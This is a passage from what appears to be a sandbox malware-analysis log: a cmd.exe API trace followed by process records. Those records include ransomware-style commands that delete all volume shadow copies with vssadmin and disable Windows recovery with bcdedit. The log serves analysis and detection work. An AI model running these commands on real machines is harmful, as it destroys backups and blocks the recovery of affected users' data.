(in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fea8 | out: phkResult=0x22fea8*=0x0) returned 0x2 [0203.522] VirtualQuery (in: lpAddress=0x22fe90, lpBuffer=0x22fe10, dwLength=0x30 | out: lpBuffer=0x22fe10*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.522] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fe10, dwLength=0x30 | out: lpBuffer=0x22fe10*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.522] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fe10, dwLength=0x30 | out: lpBuffer=0x22fe10*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.522] VirtualQuery (in: lpAddress=0x134000, lpBuffer=0x22fe10, dwLength=0x30 | out: lpBuffer=0x22fe10*(BaseAddress=0x134000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.522] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fe10, dwLength=0x30 | out: lpBuffer=0x22fe10*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0203.522] GetConsoleOutputCP () returned 0x1b5 [0203.522] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.523] SetConsoleCtrlHandler (HandlerRoutine=0x4ab73184, Add=1) returned 1 [0203.523] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.523] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0203.528] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.528] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 0 [0203.528] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.528] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0203.538] GetEnvironmentStringsW () returned 0x2c8b10* [0203.538] GetProcessHeap () returned 0x2b0000 [0203.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xac4) returned 0x2c95e0 [0203.538] FreeEnvironmentStringsW (penv=0x2c8b10) returned 1 [0203.538] GetProcessHeap () returned 0x2b0000 [0203.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2c8390 [0203.538] GetEnvironmentStringsW () returned 0x2c8b10* [0203.538] GetProcessHeap () returned 0x2b0000 [0203.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xac4) returned 0x2ca0b0 [0203.538] FreeEnvironmentStringsW (penv=0x2c8b10) returned 1 [0203.538] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed68 | out: phkResult=0x22ed68*=0x40) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x0, lpData=0x22ed80*=0x18, lpcbData=0x22ed64*=0x1000) returned 0x2 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x1, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x0, lpData=0x22ed80*=0x1, lpcbData=0x22ed64*=0x1000) returned 0x2 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x0, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x40, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x40, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x0, lpData=0x22ed80*=0x40, lpcbData=0x22ed64*=0x1000) returned 0x2 [0203.539] RegCloseKey (hKey=0x40) returned 0x0 [0203.539] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed68 | out: phkResult=0x22ed68*=0x40) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x0, lpData=0x22ed80*=0x40, lpcbData=0x22ed64*=0x1000) returned 0x2 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x1, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x0, lpData=0x22ed80*=0x1, lpcbData=0x22ed64*=0x1000) returned 0x2 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x0, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x9, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x4, lpData=0x22ed80*=0x9, lpcbData=0x22ed64*=0x4) returned 0x0 [0203.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed60, lpData=0x22ed80, lpcbData=0x22ed64*=0x1000 | out: lpType=0x22ed60*=0x0, lpData=0x22ed80*=0x9, lpcbData=0x22ed64*=0x1000) returned 0x2 [0203.539] RegCloseKey (hKey=0x40) returned 0x0 [0203.539] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae1a6 [0203.539] srand (_Seed=0x5f1ae1a6) [0203.539] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6532368\"" [0203.539] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6532368\"" [0203.540] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.540] GetProcessHeap () returned 0x2b0000 [0203.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2cab80 [0203.540] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cab90, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0203.540] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.540] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.540] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0203.540] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.540] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.540] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.540] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.540] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.540] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.540] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.540] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.540] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.540] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.540] GetProcessHeap () returned 0x2b0000 [0203.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x38) returned 0x2c6570 [0203.540] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fb70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x22fb70, lpFilePart=0x22fb50 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22fb50*="system32") returned 0x13 [0203.541] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0203.541] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x22f880 | out: lpFindFileData=0x22f880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xad0000ad, cFileName="Windows", cAlternateFileName="")) returned 0x2c8970 [0203.541] FindClose (in: hFindFile=0x2c8970 | out: hFindFile=0x2c8970) returned 1 [0203.541] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x22f880 | out: lpFindFileData=0x22f880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xad0000ad, cFileName="System32", cAlternateFileName="")) returned 0x2c8970 [0203.541] FindClose (in: hFindFile=0x2c8970 | out: hFindFile=0x2c8970) returned 1 [0203.541] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0203.541] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0203.541] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0203.541] GetProcessHeap () returned 0x2b0000 [0203.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c95e0 | out: hHeap=0x2b0000) returned 1 [0203.541] GetEnvironmentStringsW () returned 0x2c8b10* [0203.541] GetProcessHeap () returned 0x2b0000 [0203.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xac4) returned 0x2c95e0 [0203.541] FreeEnvironmentStringsW (penv=0x2c8b10) returned 1 [0203.542] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.542] GetProcessHeap () returned 0x2b0000 [0203.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6570 | out: hHeap=0x2b0000) returned 1 [0203.542] GetProcessHeap () returned 0x2b0000 [0203.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4016) returned 0x2cada0 [0203.542] GetProcessHeap () returned 0x2b0000 [0203.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x34) returned 0x2c6570 [0203.542] GetProcessHeap () returned 0x2b0000 [0203.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cada0 | out: hHeap=0x2b0000) returned 1 [0203.542] GetConsoleOutputCP () returned 0x1b5 [0203.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.543] GetUserDefaultLCID () returned 0x409 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab87b50, cchData=8 | out: lpLCData=":") returned 2 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fc80, cchData=128 | out: lpLCData="0") returned 2 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fc80, cchData=128 | out: lpLCData="0") returned 2 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fc80, cchData=128 | out: lpLCData="1") returned 2 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab9a740, cchData=8 | out: lpLCData="/") returned 2 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0203.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0203.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0203.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab87b40, cchData=8 | out: lpLCData=".") returned 2 [0203.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0203.550] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.550] GetProcessHeap () returned 0x2b0000 [0203.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20c) returned 0x2c8b80 [0203.550] GetConsoleTitleW (in: lpConsoleTitle=0x2c8b80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.557] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0203.557] GetProcAddress (hModule=0x76f60000, lpProcName="CopyFileExW") returned 0x76f723d0 [0203.557] GetProcAddress (hModule=0x76f60000, lpProcName="IsDebuggerPresent") returned 0x76f68290 [0203.557] GetProcAddress (hModule=0x76f60000, lpProcName="SetConsoleInputExeNameW") returned 0x76f717e0 [0203.558] GetProcessHeap () returned 0x2b0000 [0203.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4012) returned 0x2cada0 [0203.558] GetProcessHeap () returned 0x2b0000 [0203.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cada0 | out: hHeap=0x2b0000) returned 1 [0203.558] _wcsicmp (_String1="title", _String2=")") returned 75 [0203.558] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0203.558] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0203.558] _wcsicmp (_String1="IF", _String2="title") returned -11 [0203.558] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0203.558] _wcsicmp (_String1="REM", _String2="title") returned -2 [0203.558] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0203.558] GetProcessHeap () returned 0x2b0000 [0203.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0) returned 0x2c8da0 [0203.558] GetProcessHeap () returned 0x2b0000 [0203.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1c) returned 0x2c4630 [0203.559] GetProcessHeap () returned 0x2b0000 [0203.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x22) returned 0x2c4660 [0203.559] GetConsoleTitleW (in: lpConsoleTitle=0x22fb90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.560] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0203.560] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0203.560] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0203.560] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0203.560] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0203.560] _wcsicmp (_String1="title", _String2="CD") returned 17 [0203.560] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0203.560] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0203.560] _wcsicmp (_String1="title", _String2="REN") returned 2 [0203.560] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0203.560] _wcsicmp (_String1="title", _String2="SET") returned 1 [0203.560] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0203.560] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0203.560] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0203.560] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0203.560] _wcsicmp (_String1="title", _String2="MD") returned 7 [0203.560] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0203.560] _wcsicmp (_String1="title", _String2="RD") returned 2 [0203.560] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0203.560] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0203.560] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0203.560] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0203.560] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0203.560] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0203.560] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0203.560] _wcsicmp (_String1="title", _String2="VER") returned -2 [0203.560] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0203.560] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0203.560] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0203.560] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0203.560] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0203.560] GetProcessHeap () returned 0x2b0000 [0203.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x34) returned 0x2c65f0 [0203.561] GetProcessHeap () returned 0x2b0000 [0203.561] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c65f0, Size=0x22) returned 0x2c4690 [0203.561] GetProcessHeap () returned 0x2b0000 [0203.561] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c4690) returned 0x22 [0203.561] GetProcessHeap () returned 0x2b0000 [0203.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c65f0 [0203.561] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x22f6d0 | out: TokenHandle=0x22f6d0*=0x0) returned 0xc000007c [0203.561] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x22f6d0 | out: TokenHandle=0x22f6d0*=0x4c) returned 0x0 [0203.561] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x12, TokenInformation=0x22f6e0, TokenInformationLength=0x4, ReturnLength=0x22f6e8 | out: TokenInformation=0x22f6e0, ReturnLength=0x22f6e8) returned 0x0 [0203.561] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x1a, TokenInformation=0x22f6e8, TokenInformationLength=0x4, ReturnLength=0x22f6e0 | out: TokenInformation=0x22f6e8, ReturnLength=0x22f6e0) returned 0x0 [0203.561] NtClose (Handle=0x4c) returned 0x0 [0203.562] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x22f6b0, nSize=0x0, Arguments=0x22f6b8 | out: lpBuffer="蹠,") returned 0xf [0203.562] GetProcessHeap () returned 0x2b0000 [0203.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2c8e90 [0203.562] SetConsoleTitleW (lpConsoleTitle="Administrator: 6532368") returned 1 [0203.563] GetProcessHeap () returned 0x2b0000 [0203.563] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8e90 | out: hHeap=0x2b0000) returned 1 [0203.563] LocalFree (hMem=0x2c8e60) returned 0x0 [0203.563] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.563] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0203.563] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.563] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 0 [0203.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.563] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0203.563] SetConsoleInputExeNameW () returned 0x1 [0203.563] GetConsoleOutputCP () returned 0x1b5 [0203.564] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.564] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.564] exit (_Code=0) Process: id = "23" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x3a1a4000" os_pid = "0x330" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x73c" cmd_line = "vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 160 os_tid = 0x350 Thread: id = 164 os_tid = 0x7a8 Thread: id = 165 os_tid = 0x34c Thread: id = 180 os_tid = 0x69c Thread: id = 181 os_tid = 0x65c Process: id = "24" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x66cc3000" os_pid = "0x5a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x5cc" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 162 os_tid = 0x61c Process: id = "25" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x39953000" os_pid = "0x630" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x5d8" cmd_line = "bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 163 os_tid = 0x7ac Process: id = "26" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x677f5000" os_pid = "0x694" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "23" os_parent_pid = "0x1d4" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0003498e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 166 os_tid = 0x334 Thread: id = 167 os_tid = 0x344 Thread: id = 168 os_tid = 0x324 Thread: id = 169 os_tid = 0x5c8 Thread: id = 170 os_tid = 0x32c Thread: id = 171 os_tid = 0x618 Thread: id = 172 os_tid = 0x4e0 Thread: id = 173 os_tid = 0x348 Thread: id = 243 os_tid = 0x458 Process: id = "27" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x664fa000" os_pid = "0x268" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "26" os_parent_pid = "0x1d4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:000354f3" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 174 os_tid = 0x13c Thread: id = 175 os_tid = 0x370 Thread: id = 176 os_tid = 0x408 Thread: id = 177 os_tid = 0x40c Thread: id = 178 os_tid = 0x7a4 Thread: id = 179 os_tid = 0x21c Process: id = "28" image_name = "rundll32.exe" filename = 